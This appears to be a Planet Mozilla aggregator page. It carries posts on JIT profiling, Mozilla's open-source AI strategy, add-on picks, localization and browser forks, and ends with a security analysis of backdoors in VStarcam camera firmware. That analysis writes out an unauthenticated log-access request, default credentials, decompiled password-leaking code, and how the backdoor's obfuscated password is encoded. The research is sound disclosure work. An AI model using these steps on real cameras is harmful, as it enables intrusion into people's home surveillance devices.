08 Jan 2026

feedPlanet Mozilla

Matthew Gaudet: Non-Traditional Profiling

Also known as "you can just put whatever you want in a jitdump you know?"

When you profile JIT code, you have to tell a profiler what on earth is going on in those JIT bytes you wrote out. Otherwise the profiler will shrug and just give you some addresses.

There's a decent and fairly common format called jitdump, which originates in perf but has become used in more places. The basic thrust of the parts we care about is: you have names associated with ranges.

Of course, the basic range you'd expect to name is "function foo() was compiled to bytes 0x1000-0x1400"

Suppose you get that working. You might get a profile that looks like this one.

This profile is pretty useful: You can see from the flame chart what execution tier created the code being executed, you can see code from inline caches etc.

Before I left for Christmas break though, I had a thought: To a first approximation both -optimized- and baseline code generation is fairly 'template' style. That is to say, we emit (relatively) stable chunks of code for either one of our bytecodes, in the case of our baseline compiler, or for one of our intermediate-representation nodes in the case of Ion, our top tier compiler.

What if we looked more closely at that?

Some of our code is already tagged with AutoCreatedBy, and RAII class which pushes a creator string on, and pops it off when it's not used. I went through and added AutoCreatedBy to each of the LIR op's codegen methods (e.g. CodeGenerator::visit*). Then I rigged up our JITDump support so that instead of dumping functions, we dump the function name + whole chain of AutoCreatedBy as the 'function name' for that sequence of instructions generated while the AutoCreatedBy was live.

That gets us this profile

While it doesn't look that different, the key is in how the frames are named. Of course, the vast majority of frames just are the name of the call instruction... that only makes sense. However, you can see some interesting things if you invert the call-tree

For example, we spend 1.9% of the profiled time doing for a single self-hosted function 'visitHasShape', which is basically:

masm.loadObjShapeUnsafe(obj, output);
  masm.cmpPtrSet(Assembler::Equal, output, ImmGCPtr(ins->mir()->shape()),
                 output);

Which is not particularly complicated.

Ok so that proves out the value. What if we just say... hmmm. I actually want to aggregate across all compilation; ignore the function name, just tell me the compilation path here.

Woah. Ok, now we've got something quite different, if really hard to interpret

Even more interesting (easier to interpret) is the inverted call tree:

So across the whole program, we're spending basically 5% of the time doing guardShape. I think that's a super interesting slicing of the data.

Is it actionable? I don't know yet. I haven't opened any bugs really on this yet; a lot of the highlighted code is stuff where it's not clear that there is a faster way to do what's being done, outside of engine architectural innovation.

The reason to write this blog post is basically to share that... man we can slice-and-dice our programs in so many interesting ways. I'm sure there's more to think of. For example, not shown here was an experiment: I added AutoCreatedBy inside a single macro-assembler method set (around barriers) to try and see if I could actually see GC barrier cost (it's low on the benchmarks I checked yo).

So yeah. You can just... put stuff in your JIT dump file.

Edited to Add: I should mention this code is nowhere. Given I don't entirely know how actionable this ends up being, and the code quality is subpar, I haven't even pushed this code. Think of this as an inspiration, not a feature announcement.

08 Jan 2026 9:46pm GMT

The Mozilla Blog: Owners, not renters: Mozilla’s open source AI strategy

Abstract black halftone cloud illustration on a pink background, representing cloud computing or digital infrastructure.

The future of intelligence is being set right now, and the path we're on leads somewhere I don't want to go. We're drifting toward a world where intelligence is something you rent - where your ability to reason, create, and decide flows through systems you don't control, can't inspect, and didn't shape. In that world, the landlord can change the terms anytime, and you have no recourse but to accept what you're given.

I think we can do better. Making that happen is now central to what Mozilla is doing.

What we did for the web

Twenty-five years ago, Microsoft Internet Explorer controlled 95% of the browser market, which meant Microsoft controlled how most people experienced the internet and who could build what on what terms. Mozilla was born to change this, and Firefox succeeded beyond what most people thought possible - dropping Internet Explorer's market share to 55% in just a few years and ushering in the Web 2.0 era. The result was a fundamentally different internet. It was faster and richer for everyday users, and for developers it was a launchpad for open standards and open source that decentralized control over the core technologies of the web.

There's a reason the browser is called a "user agent." It was designed to be on your side - blocking ads, protecting your privacy, giving you choices that the sites you visited never would have offered on their own. That was the first fight, and we held the line for the open web even as social networks and mobile platforms became walled gardens.

Now AI is becoming the new intermediary. It's what I've started calling "Layer 8" - the agentic layer that mediates between you and everything else on the internet. These systems will negotiate on our behalf, filter our information, shape our recommendations, and increasingly determine how we interact with the entire digital world.

The question we have to ask is straightforward: Whose side will your new user agent be on?

Why closed systems are winning (for now)

We need to be honest about the current state of play: Closed AI systems are winning today because they are genuinely easier to use. If you're a developer with an idea you want to test, you can have a working prototype in minutes using a single API call to one of the major providers. GPUs, models, hosting, guardrails, monitoring, billing - it all comes bundled together in a package that just works. I understand the appeal firsthand, because I've made the same choice myself on late-night side projects when I just wanted the fastest path from an idea in my head to something I could actually play with.

The open-source AI ecosystem is a different story. It's powerful and advancing rapidly, but it's also deeply fragmented - models live in one repository, tooling in another, and the pieces you need for evaluation, orchestration, guardrails, memory, and data pipelines are scattered across dozens of independent projects with different assumptions and interfaces. Each component is improving at remarkable speed, but they rarely integrate smoothly out of the box, and assembling a production-ready stack requires expertise and time that most teams simply don't have to spare. This is the core challenge we face, and it's important to name it clearly: What we're dealing with isn't a values problem where developers are choosing convenience over principle. It's a developer experience problem. And developer experience problems can be solved.

The ground is already shifting

We've watched this dynamic play out before and the history is instructive. In the early days of the personal computer, open systems were rough, inconsistent, and difficult to use, while closed platforms offered polish and simplicity that made them look inevitable. Openness won anyway - not because users cared about principles, but because open systems unlocked experimentation and scale that closed alternatives couldn't match. The same pattern repeated on the web, where closed portals like AOL and CompuServe dominated the early landscape before open standards outpaced them through sheer flexibility and the compounding benefits of broad participation.

AI has the potential to follow the same path - but only if someone builds it. And several shifts are already reshaping the landscape:

The capability gap that once justified the dominance of closed systems is closing fast. What remains is a gap in usability and integration. The lesson I take from history is that openness doesn't win by being more principled than the alternatives. Openness wins when it becomes the better deal - cheaper, more capable, and just as easy to use

Where the cracks are forming

If openness is going to win, it won't happen everywhere at once. It will happen at specific tipping points - places where the defaults haven't yet hardened, where a well-timed push can change what becomes normal. We see four.

The first is developer experience. Developers are the ones who actually build the future - every default they set, every stack they choose, every dependency they adopt shapes what becomes normal for everyone else. Right now, the fastest path runs through closed APIs, and that's where most of the building is happening. But developers don't want to be locked in any more than users do. Give them open tools that work as well as the closed ones, and they'll build the open ecosystem themselves.

The second is data. For a decade, the assumption has been that data is free to scrape - that the web is a commons to be harvested without asking. That norm is breaking, and not a moment too soon. The people and communities who create valuable data deserve a say in how it's used and a share in the value it creates. We're moving toward a world of licensed, provenance-based, permissioned data. The infrastructure for that transition is still being built, which means there's still a chance to build it right.

The third is models. The dominant architecture today favors only the biggest labs, because only they can afford to train massive dense transformers. But the edges are accelerating: small models, mixtures of experts, domain-specific models, multilingual models. As these approaches mature, the ability to create and customize intelligence spreads to communities, companies, and countries that were previously locked out.

The fourth is compute. This remains the choke point. Access to specialized hardware still determines who can train and deploy at scale. More doors need to open - through distributed compute, federated approaches, sovereign clouds, idle GPUs finding productive use.

What an open stack could look like

Today's dominant AI platforms are building vertically integrated stacks: closed applications on top of closed models trained on closed data, running on closed compute. Each layer reinforces the next - data improves models, models improve applications, applications generate more data that only the platform can use. It's a powerful flywheel. If it continues unchallenged, we arrive at an AI era equivalent to AOL, except far more centralized. You don't build on the platform; you build inside it.

There's another path. The sum of Linux, Apache, MySQL, and PHP won because that combination became easier to use than the proprietary alternatives, and because they let developers build things that no commercial platform would have prioritized. The web we have today exists because that stack existed.

We think AI can follow the same pattern. Not one stack controlled by any single party, but many stacks shaped by the communities, countries, and companies that use them:

Pieces of this stack already exist - good ones, built by talented people. The task now is to fill in the gaps, connect what's there, and make the whole thing as easy to use as the closed alternatives. That's the work.

Why open source matters here

If you've followed Mozilla, you know the Manifesto. For almost 20 years, it's guided what we build and how - not as an abstract ideal, but as a tool for making principled decisions every single day. Three of its principles are especially urgent in the age of AI:

Open-source AI is how these principles become real. It's what makes plurality possible - many intelligences shaped by many communities, not one model to rule them all. It's what makes sovereignty possible - owning your infrastructure rather than renting it. And it's what keeps the door open for public-benefit alternatives to exist alongside commercial ones.

What we'll do in 2026

The window to shape these defaults is still open, but it won't stay open forever. Here's where we're putting our effort - not because we have all the answers, but because we think these are the places where openness can still reset the defaults before they harden.

Make open AI easier than closed. Mozilla.ai is building any-suite, a modular framework that integrates the scattered components of the open AI stack - model routing, evaluation, guardrails, memory, orchestration - into something coherent that developers can actually adopt without becoming infrastructure specialists. The goal is concrete: Getting started with open AI should feel as simple as making a single API call.

Shift the economics of data. The Mozilla Data Collective is building a marketplace for data that is properly licensed, clearly sourced, and aligned with the values of the communities it comes from. It gives developers access to high-quality training data while ensuring that the people and institutions who contribute that data have real agency and share in the economic value it creates.

Learn from real deployments. Strategy that isn't grounded in practical experience is just speculation, so we're deepening our engagement with governments and enterprises adopting sovereign, auditable AI systems. These engagements are the feedback loops that tell us where the stack breaks and where openness needs reinforcement.

Invest in the ecosystem. We're not just building; we're backing others who are building too. Mozilla Ventures is investing in open-source AI companies that align with these principles. Mozilla Foundation is funding researchers and projects through targeted grants. We can't do everything ourselves, and we shouldn't try. The goal is to put resources behind the people and teams already doing the work.

Show up for the community. The open-source AI ecosystem is vast, and it's hard to know what's working, what's hype, and where the real momentum is building. We want to be useful here. We're launching a newsletter to track what's actually happening in open AI. We're running meetups and hackathons to bring builders together. We're fielding developer surveys to understand what people actually need. And at MozFest this year, we're adding a dedicated developer track focused on open-source AI. If you're doing important work in this space, we want to help it find the people who need to see it.

Are you in?

Mozilla is one piece of a much larger movement, and we have no interest in trying to own or control it - we just want to help it succeed. There's a growing community of people who believe the open internet is still worth defending and who are working to ensure that AI develops along a different path than the one the largest platforms have laid out. Not everyone in that community uses the same language or builds exactly the same things, but something like a shared purpose is emerging. Mozilla sees itself as part of that effort.

We kept the web open not by asking anyone's permission, but by building something that worked better than the alternatives. We're ready to do that again.

So: Are you in?

If you're a developer building toward an open source AI future, we want to work with you. If you're a researcher, investor, policymaker, or founder aligned with these goals, let's talk. If you're at a company that wants to build with us rather than against us, the door is open. Open alternatives have to exist - that keeps everyone honest.

The future of intelligence is being set now. The question is whether you'll own it, or rent it.

We're launching a newsletter to track what's happening in open-source AI - what's working, what's hype, and where the real momentum is building. Sign up here to follow along as we build.

Read more here about our emerging strategy, and how we're rewiring Mozilla for the era of AI.

The post Owners, not renters: Mozilla's open source AI strategy appeared first on The Mozilla Blog.

08 Jan 2026 7:05pm GMT

Firefox Add-on Reviews: 2025 Staff Pick Add-ons

While nearly half of all Firefox users have installed an add-on, it's safe to say nearly all Firefox staffers use add-ons. I polled a few of my peers and here are some of our staff favorite add-ons of 2025…

Falling Snow Animated Theme

Enjoy the soothing mood of Falling Snow Animated Theme. This motion-animated dark theme turns Firefox into a calm wintry night as snowflakes cascade around the corners of your browser.

Privacy Badger

The flagship anti-tracking extension from privacy proponents at the Electronic Frontier Foundation, Privacy Badger is built to look for a certain set of actions that indicate a web page is trying to secretly track you.

Zero set up required. Just install Privacy Badger and it will automatically search for third-party cookies, HTML5 local storage "supercookies," canvas fingerprinting, and other sneaky tracking methods.

Adaptive Tab Bar Color

Turn Firefox into an internet chameleon. Adaptive Tab Bar Color changes the colors of Firefox to match whatever website you're visiting.

It's beautifully simple and sublime. No setup required, but you're free to make subtle adjustments to color contrast patterns and assign specific colors for websites.

Rainy Spring Sakura by MaDonna

Created by one of the most prolific theme designers in the Firefox community, MaDonna, we love Rainy Spring Sakura's bucolic mix of calming colors.

It's like instant Zen mode for Firefox.

Return YouTube Dislike

Do you like the Dislike? YouTube removed the thumbs-down display, but fortunately Return YouTube Dislike came along to restore our view into the sometimes brutal truth of audience sentiment.

Other Firefox users seem to agree…

"Does exactly what the name suggests. Can't see myself without this extension. Seriously, bad move on YouTube for removing such a vital tool."

Firefox user OFG

"i have never smashed 5 stars faster."

Firefox user 12918016

<figcaption class="wp-element-caption">Return YouTube Dislike re-enables a beloved feature.</figcaption>

LeechBlock NG

Block time-wasting websites with LeechBlock NG - easily one of our staff-favorite productivity tools.

Lots of customization features help you stay focused and free from websites that have a way of dragging you down. Key features:

DarkSpaceBlue

Drift through serene outer space as you browse the web. DarkSpaceBlue celebrates the infinite wonder of life among the stars.

LanguageTool - Grammar and Spell Checker

Improve your prose anywhere you write on the web. LanguageTool - Grammar and Spell Checker will make you a better writer in 25+ languages.

Much more than a basic spell checker, this privacy-centric writing aid is packed with great features:

<figcaption class="wp-element-caption">LanguageTool can help with subtle syntax improvements. </figcaption>

Sink It for Reddit!

Imagine a more focused and free feeling Reddit - that's Sink It for Reddit!

Some of our staff-favorite features include:

Sushi Nori

Turns out we have quite a few sushi fans at Firefox. We celebrate our love of sushi with the savory theme Sushi Nori.

08 Jan 2026 2:59pm GMT

07 Jan 2026

feedPlanet Mozilla

Mozilla Localization (L10N): Mozilla Localization in 2025

A Year in Data

As is tradition, we're wrapping up 2025 for Mozilla's localization efforts and offering a sneak peek at what's in store for 2026 (you can find last year's blog post here).

Pontoon's metrics in 2025 show a stable picture for both new sign-ups and monthly active users. While we always hope to see signs of strong growth, this flat trend is a positive achievement when viewed against the challenges surrounding community involvement in Open Source, even beyond Mozilla. Thank you to everyone actively participating on Pontoon, Matrix, and elsewhere for making Mozilla localization such an open and welcoming community.

The number of strings added has decreased significantly overall, but not for Firefox, where the number of new strings was 60% higher than in 2024 (check out the increase of Fluent strings alone). That is not surprising, given the amount of new features (selectable profiles, unified trust panel, backup) and the upcoming settings redesign.

As in 2024, the relentless growth in the number of locales is driven by Common Voice, which now has 422 locales enabled in Pontoon (+33%).

Before we move forward, thank you to all the volunteers who contributed their time, passion, and expertise to Mozilla's localization over the last 12 months - or plan to do so in 2026. There is always space for new contributors!

Pontoon Development

A significant part of the work on Pontoon in 2025 isn't immediately visible to users, but it lays the groundwork for improvements that will start showing up in 2026.

One of the biggest efforts was switching to a new data model to represent all strings across all supported formats. Pontoon currently needs to handle around ten different formats, as transparently as possible for localizers, and this change is a step to reduce complexity and technical debt. As a concrete outcome, we can now support proper pluralization in Android projects, and we landed the first string using this model in Firefox 146. This removes long-standing UX limitations (no more Bookmarks saved: %1$s instead of %1$s bookmarks saved) and allows languages to provide more natural-sounding translations.

In parallel, we continued investing in a unified localization library, moz-l10n, with the goal of having a centralized, well-maintained place to handle parsing and serialization across formats in both JavaScript and Python. This work is essential to keep Pontoon maintainable as we add support for new technologies and workflows.

Pontoon as a project remains very active. In 2025 alone, Pontoon saw more than 200 commits from over 20 contributors, not including work happening in external libraries such as moz-l10n.

Finally, we've been improving API support, another area that is largely invisible to end users. We moved away from GraphQL and migrated to Django REST, and we're actively working toward feature parity with Transvision to better support automation and integrations.

Community

Our main achievement in 2025 was organizing a pilot in-person event in Berlin, reconnecting localizers from around Europe after a long hiatus. Fourteen volunteers from 11 locales spent a weekend together at the Mozilla Berlin office, sharing ideas, discussing challenges, and deepening relationships that had previously existed only online. For many attendees, this was the first time they met fellow contributors they had collaborated with for years, and the energy and motivation that came out of those days clearly showed the value of human connection in sustaining our global community.

Group dinner for the localization event in BerlinThis doesn't mean we stopped exploring other ways to connect. For example, throughout the year we continued publishing Contributor Spotlights, showcasing the amazing work of individual volunteers from different parts of the world. These stories highlight not just what our contributors do, but who they are and why they make Mozilla's localization work possible.

Internally, these spotlights have played an important role for advocating on behalf of the community. By bringing real voices and contributions to the forefront, we've helped reinforce the message that investing in people - not just tools - is essential to the long-term health of Mozilla's localization ecosystem.

What's coming in 2026

As we move into the new year, our focus will shift to exploring alternative deployment solutions. Our goal is to make Pontoon faster, more reliable, and better equipped to meet the needs of our users.

This excerpt comes from last year's blog post, and while it took longer than expected, the good news is that we're finally there. On January 6, we moved Pontoon to a new hosting platform. We expect this change to bring better reliability and performance, especially in response to peaks in bot traffic that have previously made Pontoon slow or unresponsive.

In parallel, we "silently" launched the Mozilla Language Portal, a unified hub that reflects Mozilla's unique approach to localization while serving as a central resource for the global translator community. While we still plan to expand its content, the main infrastructure is now in place and publicly available, bringing together searchable translation memories, documentation, blog posts, and other resources to support knowledge-sharing and collaboration.

On the technology side, we plan to extend plural support to iOS projects and continue improving Pontoon's translation memory support. These improvements aim to make it easier to reuse translations across projects and formats, for example by matching strings independently of placeholder syntax differences, and to translate Fluent strings with multiple values.

We also aim to explore improvements in our machine translation options, evaluating how large language models could help with quality assessment or serve as alternative providers for MT suggestions.

Last but not least, we plan to keep investing in our community. While we don't know yet what that will look like in practice, keep an eye on this blog for updates.

If you have any thoughts or ideas about this plan, let us know on Mastodon or Matrix!

Thank you!

As we look toward 2026, we're grateful for the people who make Mozilla's localization possible. Through shared effort and collaboration, we'll continue breaking down barriers and building a web that works for everyone. Thank you for being part of this journey.

07 Jan 2026 1:51pm GMT

Ludovic Hirlimann: Are mozilla's fork any good?

To answer that question, we first need to understand how complex, writing or maintaining a web browser is.

A "modern" web browser is :

Of course, all the above point are interacting with one another in different ways. In order for "the web" to work, standards are developed and then implemented in the different browsers, rendering engines.

In order to "make" the browser, you need engineers to write and maintain the code, which is probably around 30 Million lines of code[5] for Firefox. Once the code is written, it needs to be compiled [6] and tested [6]. This requires machines that run the operating system the browser ships to (As of this day, mozilla officially ships on Linux, Microslop Windows and MacOS X - community builds for *BSD do exists and are maintained). You need engineers to maintain the compile (build) infrastructure.

Once the engineers that are responsible for the releases [7] have decided what codes and features were mature enough, they start assembling the bits of code and like the engineers, build, test and send the results to the people using said web browser.

When I was employed at Mozilla (the company that makes Firefox) around 900+ engineers were tasked with the above and a few more were working on research and development. These engineers are working 5 days a week, 8 hours per day, that's 1872000 hours of engineering brain power spent every year (It's actually less because I have not taken vacations into account) on making Firefox versions. On top of that, you need to add the cost of building and running the test before a new version reaches the end user.

The current browsing landscape looks dark, there are currently 3 choices for rendering engines, KHTML based browsers, blink based ones and gecko based ones. 90+% of the market is dominated by KHTML/blink based browsers. Blink is a fork of KHTML. This leads to less standard work, if the major engine implements a feature and others need to play catchup to stay relevant, this has happened in the 2000s with IE dominating the browser landscape[8], making it difficult to use macOS 9 or X (I'm not even mentioning Linux here :)). This also leads to most web developers using Chrome and once in a while testing with Firefox or even Safari. But if there's a little glitch, they can still ship because of market shares.

Firefox was started back in 1998, when embedding software was not really a thing with all the platform that were to be supported. Firefox is very hard to embed (eg use as a softwrae library and add stuff on top). I know that for a fact because both Camino and Thunderbird are embeding gecko.

In the last few years, Mozilla has been itching the people I connect to, who are very privacy focus and do not see with a good eye what Mozilla does with Firefox. I believe that Mozilla does this in order to stay relevant to normal users. It needs to stay relevant for at least two things :

  1. Keep the web standards open, so anyone can implement a web browser / web services.
  2. to have enough traffic to be able to pay all the engineers working on gecko.

Now that, I've explained a few important things, let's answer the question "Are mozilla's fork any good?"

I am biased as I've worked for the company before. But how can a few people, even if they are good and have plenty of free time, be able to cope with what maintaining a fork requires :

If you are comfortable with that, then using a fork because Mozilla is pushing stuff you don't want is probably doable. If not, you can always kill those features you don't like using some `about:config` magic.

Now, I've set a tone above that foresees a dark future for open web technologies. What Can you do to keep the web open and with some privacy focus?

  1. Keep using Mozilla Nightly
  2. Give servo a try

[1] HTML is interpreted code, that's why it needs to be parsed and then rendered.

[2] In order to draw and image or a photo on a screen, you need to be able to encode it or decode it. Many file formats are available.

[3] Is a computer language that transforms HTML into something that can interact with the person using the web browser. See https://developer.mozilla.org/en-US/docs/Glossary/JavaScript

[4] Operating systems need to the very least know which program to open files with. The OS landscape has changed a lot over the last 25 years. These days you need to support 3 major OS, while in the 2000s you had more systems, IRIX for example. You still have some portions of the Mozilla code base that support these long dead systems.

[5]https://math.answers.com/math-and-arithmetic/How_many_lines_of_code_in_mozillafirefox

[6] Testing implies, testing the code and also having engineers or users using the unfinished product to see that it doesn't regress. Testing Mozilla, is explained at https://ehsanakhgari.org/wp-content/uploads/talks/test-mozilla/

[7] Read a release equals a version. Version 1.5 is a release, as is version 3.0.1.

[8] https://en.wikipedia.org/wiki/Browser_wars

07 Jan 2026 1:26pm GMT

Wladimir Palant: Backdoors in VStarcam cameras

VStarcam is an important brand of cameras based on the PPPP protocol. Unlike the LookCam cameras I looked into earlier, these are often being positioned as security cameras. And they in fact do a few things better like… well, like having a mostly working authentication mechanism. In order to access the camera one has to know its administrator password.

So much for the theory. When I looked into the firmware of the cameras I discovered a surprising development: over the past years this protection has been systematically undermined. Various mechanisms have been added that leak the access password, and in several cases these cannot be explained as accidents. The overall tendency is clear: for some reason VStarcam really wants to have access to their customer's passwords.

A reminder: "P2P" functionality based on the PPPP protocol means that these cameras will always communicate with and be accessible from the internet, even when located on a home network behind NAT. Short of installing a custom firmware this can only addressed by configuring the network firewall to deny internet access.

Contents

How to recognize affected cameras

Not every VStarcam camera has "VStarcam" printed on the side. I have seen reports of VStarcam cameras being sold under the brand names Besder, MVPower, AOMG, OUSKI, and there are probably more.

Most cameras should be recognizable by the app used to manage them. Any camera managed by one of these apps should be a VStarcam camera: Eye4, EyeCloud, FEC Smart Home, HOTKam, O-KAM Pro, PnPCam, VeePai, VeeRecon, Veesky, VKAM, VsCam, VStarcam Ultra.

Downloading the firmware

VStarcam cameras have a mechanism to deliver firmware updates (LookCam cameras prove that this shouldn't be taken for granted). The app managing the camera will request update information from an address like http://api4.eye4.cn:808/firmware/1.2.3.4/EN where 1.2.3.4 is the firmware version. If a firmware update is available the response will contain a download server and a download path. The app sends these to the device which then downloads and installs the updated firmware.

Both requests are performed over plain HTTP and this is already the first issue. If an attacker can produce a manipulated response either on the network that the app or the device are connected to they will be able to install a malicious update on the camera. The former is particularly problematic, as the camera owner may connect to an open WiFi or similarly untrusted networks while being out.

The last part of a firmware version is a build number which is ignored for the update requests. The first part is a vendor ID where only a few options seem relevant (I checked 10, 48 and 66). The rest of the version number can be easily enumerated. Many firmware branches don't have an active update, and when they do some updates won't download because the servers in question appear no longer operational. Still, I found 380 updates this way.

I managed to unpack all but one of these updates. Firmware version 10.1.110.2 wasn't for a camera but rather some device with an HDMI connector and without any P2P functionality - probably a Network Video Recorder (NVR). Firmware version 10.121.160.42 wasn't using PPPP but something called NHEP2P and an entirely different application-level protocol. Ten updates weren't updating the camera application but only the base system. This left 367 firmware versions for this investigation.

Caveats of this survey

I do not own any VStarcam hardware, nor would it be feasible to investigate hundreds of different firmware versions with real hardware. The results of this article are based solely on reverse engineering, emulation, and automated analysis via running Ghidra in headless mode. While I can easily emulate a PPPP server, doing the same for the VStarcam cloud infrastructure isn't possible, I simply don't know how it behaves. Similarly, the firmware's interaction with hardware had to be left out of the emulation. While I'm still quite confident in my results, these limitations could introduce errors.

More importantly, there are only so many firmware versions that I checked manually. Most of them were checked automatically, and I typically only looked at a few lines of decompiled code that my scripts extracted. There is potential for false negatives here, I expect that there are more issues with VStarcam firmware than what's listed here.

VStarcam's authentication approach

When an app communicates with a camera, it sends commands like GET /check_user.cgi?loginuse=admin&loginpas=888888&user=admin&pwd=888888. Despite the looks of it, these aren't HTTP requests passed on to a web server. Instead, the firmware handles these in function P2pCgiParamFunction which doesn't even attempt to parse the request. The processing code looks for substrings like check_user.cgi to identify the command (yes, you better don't set check_user.cgi as your access password). Parameter extraction works via similar substring matching.

It's worth noting that these cameras have a very peculiar authentication system which VStarcam calls "dual authentication." Here is how the Eye4 application describes it:

The dual authentication mechanism is a measure to upgrade the whole system security

  1. The device will double check the identity of the visitor and does not support the old version of app.
  2. Considering the security risk of possible leakage, the plaintext password mode of the device was turned off and ciphertext access was used.
  3. After the device is added for the first time, it will not be allowed to be added for a second time, and it will be shared by the person who has added it.

I'm not saying that this description is utter bullshit but there is a considerable mismatch with the reality that I can observe. The VStarcam firmware cannot accept anything other than plaintext passwords. Newer firmware versions employ obfuscation on the PPPP-level but this hardly deserves the name "ciphertext".

What I can see is: once a device is enrolled into dual authentication, the authentication is handled by function GetUserPri_doubleVerify rather than GetUserPri. There isn't a big difference between the two, both will try the credentials from the loginuse/loginpas parameters and fall back to the user/pwd credentials pair. Function GetUserPri_doubleVerify merely checks a different password.

From the applications I get the impression that the dual authentication password is automatically generated and probably not even shared with the user but stored in their cloud account. This is an improvement over the regular password that defaults to 888888 and allowed these cameras to be enrolled into a botnet. But it's still a plaintext password used for authentication.

There is a second aspect to dual authentication. When dual authentication is used, the app is supposed to make a second authentication call to eye4_authentication.cgi. The loginAccount and loginToken parameters here appear to belong to the user's cloud account, apparently meant to make sure that only the right user can access a device.

Yet in many firmware versions I've seen the eye4_authentication.cgi request always succeeds. The function meant to perform a web request is simply hardcoded to return the success code 200. Other firmware versions actually make a request to https://verification.eye4.cn, yet this server also seems to produce a 200 response regardless of what parameters I try. It seems that VStarcam never made this feature work the way they intended it.

None of this stopped VStarcam from boasting on their website merely a year ago:

A promotion image with the following text: O-KAM Pro. Dual authentication mechanism. AES financial grade encryption + dual authentication. We highly protect your data and privacy. Server distribution: low-power devices, 4 master servers, namely Hangzhou, Hong Kong, Frankfurt, Silicon Valey, etc.

You can certainly count on anything saying "financial grade encryption" being bullshit. I have no idea where AES comes into the picture here, I haven't seen it being used anywhere. Maybe it's their way of saying "we use TLS when connecting to our cloud infrastructure."

Endpoint protection

A reasonable approach to authentication is: authentication is required before any requests unrelated to authentication can be made. This is not the approach taken by VStarcam firmware. Instead, some firmware versions decide for each endpoint individually whether authentication is necessary. Other versions put a bunch of endpoints outside of the code enforcing authentication.

The calls explicitly excluded from authentication differ by firmware version but are for example: get_online_log.cgi, show_prodhwfg.cgi, ircut_test.cgi, clear_log.cgi, alexa_ctrl.cgi, server_auth.cgi. For most of these it isn't obvious why they should be accessible to unauthenticated users. But get_online_log.cgi caught my attention in particular.

Unauthenticated log access

So a request like GET /get_online_log.cgi?enable=1 can be sent to a camera without any authentication. This isn't a request that any of the VStarcam apps seem to support, what does it do?

Despite the name this isn't a download request, it rather sets a flag for the current connection. The logic behind this involves many moving parts including a Linux kernel module but the essence is this: whenever the application logs something via LogSystem_WriteLog function, the application won't merely print that to stderr and write it to the log file on the SD card but also send it to any connection that has this flag set.

What does the application log? Lots and lots of stuff. On average, VStarcam firmware has around 1500 such logging calls. For example, it could log security tokens:

LogSystem_WriteLog("qiniu.c", "upload_qiniu", 497, 0,
                   "upload_qiniu*** filename = %s, fileid = %s, uptoken = %s\n", );
LogSystem_WriteLog("pushservice.c", "parsePushServerRequest_cjson", 5281, 1,
                   "address=%s token =%s master= %d timestamp = %d", );
LogSystem_WriteLog("queue.c", "CloudUp_Manage_Pth", 347, 2,
                   "token=%s", );

It could log cloud server responses:

LogSystem_WriteLog("pushservice.c", "curlPostMqttAuthCb", 4407, 3,
                   "\n\nrspBuf = %s\n", );
LogSystem_WriteLog("post/postFileToCloud.c", "curl_post_file_cb", 74, 0,
                   "\n\nrspBuf = %s\n", );
LogSystem_WriteLog("pushserver.c", "curl_Eye4Authentication_write_data_cb", 2822, 0,
                   "rspBuf = %s", );

And of course it will log the requests coming in via PPPP:

LogSystem_WriteLog("vstcp2pcmd.c", "P2pCgiParamFunction", 633, 0,
                   "sit %d, pcmd: %s", );

Reminder: these requests contain the authentication password as parameter. So an attacker can connect to a vulnerable device, request logs and wait for the legitimate device owner to connect. Once they do their password will show up in the logs - voila, the attacker has access now.

VStarcam appears to be at least somewhat aware of this issue because some firmware versions contain code "censoring" password parameters prior to logging:

memcpy(pcmd, request, sizeof(pcmd));
char* pos = strstr(pcmd, "loginuse");
if (pos)
  *pos = 0;
LogSystem_WriteLog("vstcp2pcmd.c", "P2pCgiParamFunction", 633, 0,
                   "sit %d, pcmd: %s", sit, pcmd);

But that's only the beginning of the story of course.

Explicit password leaking via logs

In addition to the logging calls where the password leaks as a (possibly unintended) side-effect, some logging calls are specifically designed to write the device password to the log. For example, the function GetUserPri meant to handle authentication when dual authentication isn't enabled will often do something like this on a failed login attempt:

LogSystem_WriteLog("sysparamapp.c", "GetUserPri", 177, 0,
                   "loginuse=%s&loginpas=%s&user=admin&pwd=888888&", gUser, gPassword);

These aren't the parameters of a received login attempt but rather what the parameters should look like for the request to succeed. And if the attacker enabled log access for their connection they will get the device credentials handed on a silver platter - without even having to wait for the device owner to connect.

If dual authentication is enabled, function GetUserPri_doubleVerify often contains a similar call:

LogSystem_WriteLog("web.c", "GetUserPri_doubleVerify", 536, 0,
                   "pri[%d] system OwnerPwd[%s] app Pwd[%s]",
                   pri, gOwnerPassword, gAppPassword);

Log uploading

What got me confused at first were the firmware versions that would log the "correct" password on failed authentication attempts but lacked the capability for unauthenticated log access. When I looked closer I found the function DoSendLogToNodeServer. The firmware receives a "node configuration" from a server which includes a "push IP" and the corresponding port number. It then opens a persistent TCP connection to that address (unencrypted of course), so that DoSendLogToNodeServer can send messages to it.

Despite the name this function doesn't upload all of the application logs. There are only three to four DoSendLogToNodeServer calls in the firmware versions I looked at, and two are invariably found in function P2pCgiParamFunction, in code running on first failed authentication attempt:

sprintf(buffer,"password error [doublePwd][%s], [PassWd][%s]", gOwnerPassword, gPassword);
DoSendLogToNodeServer(request);
DoSendLogToNodeServer(buffer);

This is sending both the failed authentication request and the correct passwords to a VStarcam server. So while the password isn't being leaked here to everybody who knows how to ask, it's still being leaked to VStarcam themselves. And anybody who is eavesdropping on the device's traffic of course.

A few firmware versions have log upload functionality in a function called startUploadLogToServer, here really all logging output is being uploaded to the server. This one isn't called unconditionally however but rather enabled by the setLogUploadEnable.cgi endpoint. An endpoint which, you guessed it, can be accessed without authentication. But at least these firmware versions don't seem to have any explicit password logging, only the "regular" logging of requests.

Password-leaking backdoor

With some considerable effort all of the above could be explained as debugging functionality which was mistakenly shipped to production. VStarcam wouldn't be the first company to fail realizing that functionality labeled "for debugging purposes only" will still be abused if released with the production build of their software. But I found yet another password leak which can only be described as a backdoor.

At some point VStarcam introduced a second version of their get_online_log.cgi API. When that second version is requested the device will respond with something like:

result=0;
index=12345678;
str=abababababab;

The result=0 part is typical and indicates that authentication (or lack thereof in this case) was successful. The other two values are unusual, and eventually I decided to check what they were about. Turned out, str is a hex-encoded version of the device password after it was XOR'ed with a random byte. And index is an obfuscated representation of that byte.

I can only explain it like this: somebody at VStarcam thought that leaking passwords via log output was too obvious, people might notice. So they decided to expose the device password in a more subtle way, one that only they knew how to decode (unless somebody notices this functionality and spends two minutes studying it in the firmware).

